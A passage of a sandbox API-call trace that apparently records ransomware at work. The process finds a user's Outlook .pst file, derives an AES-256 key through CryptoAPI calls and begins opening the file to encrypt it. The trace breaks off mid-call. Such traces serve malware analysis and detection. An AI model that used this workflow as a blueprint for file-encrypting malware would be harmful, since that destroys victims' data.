lpString1="oeimd@djhreuu.uhd.pst\"", cchCount1=9, lpString2="encrypted", cchCount2=9) returned 3 [0036.705] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="eimd@djhreuu.uhd.pst\"", cchCount1=9, lpString2="encrypted", cchCount2=9) returned 1 [0036.705] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="imd@djhreuu.uhd.pst\"", cchCount1=9, lpString2="encrypted", cchCount2=9) returned 3 [0036.705] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="md@djhreuu.uhd.pst\"", cchCount1=9, lpString2="encrypted", cchCount2=9) returned 3 [0036.705] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="d@djhreuu.uhd.pst\"", cchCount1=9, lpString2="encrypted", cchCount2=9) returned 1 [0036.705] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="@djhreuu.uhd.pst\"", cchCount1=9, lpString2="encrypted", cchCount2=9) returned 1 [0036.705] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="djhreuu.uhd.pst\"", cchCount1=9, lpString2="encrypted", cchCount2=9) returned 1 [0036.705] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="jhreuu.uhd.pst\"", cchCount1=9, lpString2="encrypted", cchCount2=9) returned 3 [0036.705] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="hreuu.uhd.pst\"", cchCount1=9, lpString2="encrypted", cchCount2=9) returned 3 [0036.705] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="reuu.uhd.pst\"", cchCount1=9, lpString2="encrypted", cchCount2=9) returned 3 [0036.705] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="euu.uhd.pst\"", cchCount1=9, lpString2="encrypted", cchCount2=9) returned 3 [0036.705] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="uu.uhd.pst\"", cchCount1=9, lpString2="encrypted", cchCount2=9) returned 3 [0036.705] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="u.uhd.pst\"", cchCount1=9, lpString2="encrypted", cchCount2=9) returned 3 [0036.705] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1=".uhd.pst\"", cchCount1=9, lpString2="encrypted", cchCount2=9) returned 1 [0036.705] PeekMessageW (in: lpMsg=0x6aefc4, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6aefc4) returned 0 [0036.705] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x4) returned 0x7af5c8 [0036.705] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x30) returned 0x7b45c8 [0036.705] CharUpperBuffW (in: lpsz="_CRYPT_ENCRYPTFILE", cchLength=0x12 | out: lpsz="_CRYPT_ENCRYPTFILE") returned 0x12 [0036.705] CharUpperBuffW (in: lpsz="_GETFILENAMEEXEXT", cchLength=0x11 | out: lpsz="_GETFILENAMEEXEXT") returned 0x11 [0036.705] PeekMessageW (in: lpMsg=0x6aeb54, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6aeb54) returned 0 [0036.705] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x20) returned 0x7b1a80 [0036.705] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x889610 [0036.705] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x4) returned 0x7af368 [0036.705] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="t", cchCount1=1, lpString2=".", cchCount2=1) returned 3 [0036.705] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="st", cchCount1=1, lpString2=".", cchCount2=1) returned 3 [0036.705] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="pst", cchCount1=1, lpString2=".", cchCount2=1) returned 3 [0036.705] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1=".pst", cchCount1=1, lpString2=".", cchCount2=1) returned 2 [0036.705] PeekMessageW (in: lpMsg=0x6aeb54, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6aeb54) returned 0 [0036.705] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x8) returned 0x7af568 [0036.705] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x8) returned 0x7af408 [0036.705] PeekMessageW (in: lpMsg=0x6aeb54, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6aeb54) returned 0 [0036.706] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x20) returned 0x7b19b8 [0036.706] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x88cc40 [0036.706] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x4) returned 0x7af568 [0036.706] PeekMessageW (in: lpMsg=0x6aeb54, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6aeb54) returned 0 [0036.706] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x8) returned 0x7af408 [0036.706] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x20) returned 0x7b1bc0 [0036.706] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x88c8e0 [0036.706] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x8) returned 0x7af4b8 [0036.706] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x88cbf8 [0036.706] PeekMessageW (in: lpMsg=0x6aeb54, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6aeb54) returned 0 [0036.706] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x8) returned 0x7af408 [0036.706] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x8897c0 [0036.706] PeekMessageW (in: lpMsg=0x6aed6c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6aed6c) returned 0 [0036.706] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x20) returned 0x7b1a80 [0036.706] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x88cdc0 [0036.706] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x4) returned 0x7af408 [0036.706] FindFirstFileW (in: lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Documents\\Outlook Files\\voeimd@djhreuu.uhd.pst", lpFindFileData=0x6ae7b8 | out: lpFindFileData=0x6ae7b8*(dwFileAttributes=0x2020, ftCreationTime.dwLowDateTime=0x5a868660, ftCreationTime.dwHighDateTime=0x1d2fad7, ftLastAccessTime.dwLowDateTime=0x5a868660, ftLastAccessTime.dwHighDateTime=0x1d2fad7, ftLastWriteTime.dwLowDateTime=0x6228cf40, ftLastWriteTime.dwHighDateTime=0x1d2fad7, nFileSizeHigh=0x0, nFileSizeLow=0x42400, dwReserved0=0x6ae908, dwReserved1=0x777648, cFileName="voeimd@djhreuu.uhd.pst", cAlternateFileName="VOEIMD~1.PST")) returned 0x7c2240 [0036.706] FindClose (in: hFindFile=0x7c2240 | out: hFindFile=0x7c2240) returned 1 [0036.706] PeekMessageW (in: lpMsg=0x6aed6c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6aed6c) returned 0 [0036.706] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x4) returned 0x7da138 [0036.706] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x20) returned 0x7b1b48 [0036.706] CharUpperBuffW (in: lpsz="_CRYPT_STARTUP", cchLength=0xe | out: lpsz="_CRYPT_STARTUP") returned 0xe [0036.706] PeekMessageW (in: lpMsg=0x6aeb14, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6aeb14) returned 0 [0036.706] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x8) returned 0x7da138 [0036.706] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x4) returned 0x7da3b8 [0036.707] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x30) returned 0x7b4440 [0036.707] CharUpperBuffW (in: lpsz="__CRYPT_REFCOUNT", cchLength=0x10 | out: lpsz="__CRYPT_REFCOUNT") returned 0x10 [0036.707] PeekMessageW (in: lpMsg=0x6ae6f4, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6ae6f4) returned 0 [0036.707] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x8) returned 0x7da3b8 [0036.707] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x8) returned 0x7da2e8 [0036.707] PeekMessageW (in: lpMsg=0x6aeb14, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6aeb14) returned 0 [0036.707] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x20) returned 0x7b1b48 [0036.707] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x88ca18 [0036.707] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x4) returned 0x7da138 [0036.707] LoadLibraryW (lpLibFileName="Advapi32.dll") returned 0x754b0000 [0036.707] PeekMessageW (in: lpMsg=0x6aeb14, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6aeb14) returned 0 [0036.707] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x8) returned 0x7da3b8 [0036.707] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x8) returned 0x7da2e8 [0036.707] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x8) returned 0x7da268 [0036.707] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x18) returned 0x7ae948 [0036.707] PeekMessageW (in: lpMsg=0x6aeb14, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6aeb14) returned 0 [0036.707] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x4) returned 0x7da3b8 [0036.707] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x30) returned 0x7b4440 [0036.707] CharUpperBuffW (in: lpsz="__CRYPT_DLLHANDLESET", cchLength=0x14 | out: lpsz="__CRYPT_DLLHANDLESET") returned 0x14 [0036.707] PeekMessageW (in: lpMsg=0x6ae8bc, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6ae8bc) returned 0 [0036.707] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x8) returned 0x7da268 [0036.707] PeekMessageW (in: lpMsg=0x6ae8bc, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6ae8bc) returned 0 [0036.707] PeekMessageW (in: lpMsg=0x6aeb14, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6aeb14) returned 0 [0036.707] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x20) returned 0x7b1ad0 [0036.707] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x88ce38 [0036.707] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x4) returned 0x7da3b8 [0036.707] PeekMessageW (in: lpMsg=0x6aeb14, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6aeb14) returned 0 [0036.708] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x20) returned 0x7b1788 [0036.708] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x88c958 [0036.708] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x4) returned 0x7da2e8 [0036.708] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x8897d8 [0036.708] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x88cee0 [0036.708] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x8) returned 0x7da268 [0036.708] CharUpperBuffW (in: lpsz="__CRYPT_DLLHANDLE", cchLength=0x11 | out: lpsz="__CRYPT_DLLHANDLE") returned 0x11 [0036.708] PeekMessageW (in: lpMsg=0x6ae4c4, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6ae4c4) returned 0 [0036.708] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x8) returned 0x7da278 [0036.708] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x8) returned 0x7da258 [0036.708] CharLowerBuffW (in: lpsz="bool", cchLength=0x4 | out: lpsz="bool") returned 0x4 [0036.708] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x88c790 [0036.708] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x4) returned 0x7da278 [0036.708] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x4) returned 0x7da258 [0036.708] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x88c808 [0036.708] CryptAcquireContextA (in: phProv=0x6ae498, szContainer=0x0, szProvider=0x0, dwProvType=0x18, dwFlags=0xf0000000 | out: phProv=0x6ae498*=0x7d5c40) returned 1 [0036.709] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x4) returned 0x7da198 [0036.709] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x214) returned 0x7b8158 [0036.709] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x18) returned 0x7ae928 [0036.709] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x88c790 [0036.709] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x88c808 [0036.709] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x88cf10 [0036.709] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x4) returned 0x7da228 [0036.709] PeekMessageW (in: lpMsg=0x6aeb14, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6aeb14) returned 0 [0036.709] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x8) returned 0x7da268 [0036.709] PeekMessageW (in: lpMsg=0x6aeb14, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6aeb14) returned 0 [0036.709] CharUpperBuffW (in: lpsz="__CRYPT_CONTEXTSET", cchLength=0x12 | out: lpsz="__CRYPT_CONTEXTSET") returned 0x12 [0036.709] PeekMessageW (in: lpMsg=0x6ae8bc, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6ae8bc) returned 0 [0036.709] PeekMessageW (in: lpMsg=0x6ae8bc, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6ae8bc) returned 0 [0036.709] PeekMessageW (in: lpMsg=0x6aeb14, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6aeb14) returned 0 [0036.709] PeekMessageW (in: lpMsg=0x6aeb14, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6aeb14) returned 0 [0036.709] PeekMessageW (in: lpMsg=0x6aeb14, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6aeb14) returned 0 [0036.709] CharUpperBuffW (in: lpsz="__CRYPT_REFCOUNTINC", cchLength=0x13 | out: lpsz="__CRYPT_REFCOUNTINC") returned 0x13 [0036.709] PeekMessageW (in: lpMsg=0x6ae8bc, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6ae8bc) returned 0 [0036.709] PeekMessageW (in: lpMsg=0x6ae8bc, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6ae8bc) returned 0 [0036.709] PeekMessageW (in: lpMsg=0x6aeb14, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6aeb14) returned 0 [0036.709] PeekMessageW (in: lpMsg=0x6aed6c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6aed6c) returned 0 [0036.710] PeekMessageW (in: lpMsg=0x6aed6c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6aed6c) returned 0 [0036.710] PeekMessageW (in: lpMsg=0x6aed6c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6aed6c) returned 0 [0036.710] CharUpperBuffW (in: lpsz="_CRYPT_DERIVEKEY", cchLength=0x10 | out: lpsz="_CRYPT_DERIVEKEY") returned 0x10 [0036.710] PeekMessageW (in: lpMsg=0x6ae83c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6ae83c) returned 0 [0036.710] PeekMessageW (in: lpMsg=0x6ae83c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6ae83c) returned 0 [0036.710] CharUpperBuffW (in: lpsz="_CRYPT_STARTUP", cchLength=0xe | out: lpsz="_CRYPT_STARTUP") returned 0xe [0036.710] PeekMessageW (in: lpMsg=0x6ae5e4, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6ae5e4) returned 0 [0036.710] CharUpperBuffW (in: lpsz="__CRYPT_REFCOUNT", cchLength=0x10 | out: lpsz="__CRYPT_REFCOUNT") returned 0x10 [0036.710] PeekMessageW (in: lpMsg=0x6ae1c4, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6ae1c4) returned 0 [0036.710] PeekMessageW (in: lpMsg=0x6ae5e4, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6ae5e4) returned 0 [0036.710] PeekMessageW (in: lpMsg=0x6ae5e4, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6ae5e4) returned 0 [0036.710] CharUpperBuffW (in: lpsz="__CRYPT_REFCOUNTINC", cchLength=0x13 | out: lpsz="__CRYPT_REFCOUNTINC") returned 0x13 [0036.710] PeekMessageW (in: lpMsg=0x6ae38c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6ae38c) returned 0 [0036.710] PeekMessageW (in: lpMsg=0x6ae38c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6ae38c) returned 0 [0036.710] PeekMessageW (in: lpMsg=0x6ae5e4, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6ae5e4) returned 0 [0036.710] PeekMessageW (in: lpMsg=0x6ae83c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6ae83c) returned 0 [0036.710] PeekMessageW (in: lpMsg=0x6ae83c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6ae83c) returned 0 [0036.710] CharUpperBuffW (in: lpsz="__CRYPT_DLLHANDLE", cchLength=0x11 | out: lpsz="__CRYPT_DLLHANDLE") returned 0x11 [0036.710] PeekMessageW (in: lpMsg=0x6ae1d4, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6ae1d4) returned 0 [0036.711] CharUpperBuffW (in: lpsz="__CRYPT_CONTEXT", cchLength=0xf | out: lpsz="__CRYPT_CONTEXT") returned 0xf [0036.711] PeekMessageW (in: lpMsg=0x6ae1d4, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6ae1d4) returned 0 [0036.711] CharLowerBuffW (in: lpsz="bool", cchLength=0x4 | out: lpsz="bool") returned 0x4 [0036.711] CryptCreateHash (in: hProv=0x7d5c40, Algid=0x8003, hKey=0x0, dwFlags=0x0, phHash=0x6ae208 | out: phHash=0x6ae208) returned 1 [0036.711] PeekMessageW (in: lpMsg=0x6ae83c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6ae83c) returned 0 [0036.711] PeekMessageW (in: lpMsg=0x6ae83c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6ae83c) returned 0 [0036.711] PeekMessageW (in: lpMsg=0x6ae83c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6ae83c) returned 0 [0036.711] PeekMessageW (in: lpMsg=0x6ae83c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6ae83c) returned 0 [0036.711] CharLowerBuffW (in: lpsz="byte[256]", cchLength=0x9 | out: lpsz="byte[256]") returned 0x9 [0036.711] PeekMessageW (in: lpMsg=0x6ae83c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6ae83c) returned 0 [0036.711] PeekMessageW (in: lpMsg=0x6ae83c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6ae83c) returned 0 [0036.711] CharUpperBuffW (in: lpsz="__CRYPT_DLLHANDLE", cchLength=0x11 | out: lpsz="__CRYPT_DLLHANDLE") returned 0x11 [0036.711] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7b4440 | out: hHeap=0x770000) returned 1 [0036.711] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7da3f8 | out: hHeap=0x770000) returned 1 [0036.711] PeekMessageW (in: lpMsg=0x6ae1d4, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6ae1d4) returned 0 [0036.711] CharLowerBuffW (in: lpsz="bool", cchLength=0x4 | out: lpsz="bool") returned 0x4 [0036.711] CryptHashData (hHash=0x7c2100, pbData=0x7c95d0, dwDataLen=0x100, dwFlags=0x1) returned 1 [0036.711] PeekMessageW (in: lpMsg=0x6ae83c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6ae83c) returned 0 [0036.711] PeekMessageW (in: lpMsg=0x6ae83c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6ae83c) returned 0 [0036.711] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7c2200 | out: hHeap=0x770000) returned 1 [0036.711] PeekMessageW (in: lpMsg=0x6ae83c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6ae83c) returned 0 [0036.712] CharUpperBuffW (in: lpsz="__CRYPT_DLLHANDLE", cchLength=0x11 | out: lpsz="__CRYPT_DLLHANDLE") returned 0x11 [0036.712] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7b4440 | out: hHeap=0x770000) returned 1 [0036.712] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7da3f8 | out: hHeap=0x770000) returned 1 [0036.712] PeekMessageW (in: lpMsg=0x6ae1d4, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6ae1d4) returned 0 [0036.712] CharUpperBuffW (in: lpsz="__CRYPT_CONTEXT", cchLength=0xf | out: lpsz="__CRYPT_CONTEXT") returned 0xf [0036.712] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7b1698 | out: hHeap=0x770000) returned 1 [0036.712] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7da3f8 | out: hHeap=0x770000) returned 1 [0036.712] PeekMessageW (in: lpMsg=0x6ae1d4, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6ae1d4) returned 0 [0036.712] CharLowerBuffW (in: lpsz="bool", cchLength=0x4 | out: lpsz="bool") returned 0x4 [0036.712] CryptDeriveKey (in: hProv=0x7d5c40, Algid=0x660e, hBaseData=0x7c2100, dwFlags=0x1, phKey=0x6ae208 | out: phKey=0x6ae208*=0x7c2200) returned 1 [0036.712] PeekMessageW (in: lpMsg=0x6ae83c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6ae83c) returned 0 [0036.712] PeekMessageW (in: lpMsg=0x6ae83c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6ae83c) returned 0 [0036.712] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7c22c0 | out: hHeap=0x770000) returned 1 [0036.712] PeekMessageW (in: lpMsg=0x6ae83c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6ae83c) returned 0 [0036.712] PeekMessageW (in: lpMsg=0x6ae83c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6ae83c) returned 0 [0036.712] PeekMessageW (in: lpMsg=0x6ae83c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6ae83c) returned 0 [0036.712] CharUpperBuffW (in: lpsz="__CRYPT_DLLHANDLE", cchLength=0x11 | out: lpsz="__CRYPT_DLLHANDLE") returned 0x11 [0036.712] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7b4440 | out: hHeap=0x770000) returned 1 [0036.712] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7da288 | out: hHeap=0x770000) returned 1 [0036.712] PeekMessageW (in: lpMsg=0x6ae344, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6ae344) returned 0 [0036.712] CharLowerBuffW (in: lpsz="bool", cchLength=0x4 | out: lpsz="bool") returned 0x4 [0036.712] CryptDestroyHash (hHash=0x7c2100) returned 1 [0036.712] PeekMessageW (in: lpMsg=0x6ae83c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6ae83c) returned 0 [0036.712] PeekMessageW (in: lpMsg=0x6aed6c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6aed6c) returned 0 [0036.712] PeekMessageW (in: lpMsg=0x6aed6c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6aed6c) returned 0 [0036.712] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7c2100 | out: hHeap=0x770000) returned 1 [0036.713] PeekMessageW (in: lpMsg=0x6aed6c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6aed6c) returned 0 [0036.713] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7c2140 | out: hHeap=0x770000) returned 1 [0036.713] PeekMessageW (in: lpMsg=0x6aed6c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6aed6c) returned 0 [0036.713] CreateFileW (lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Documents\\Outlook Files\\voeimd@djhreuu.uhd.pst" (normalized: 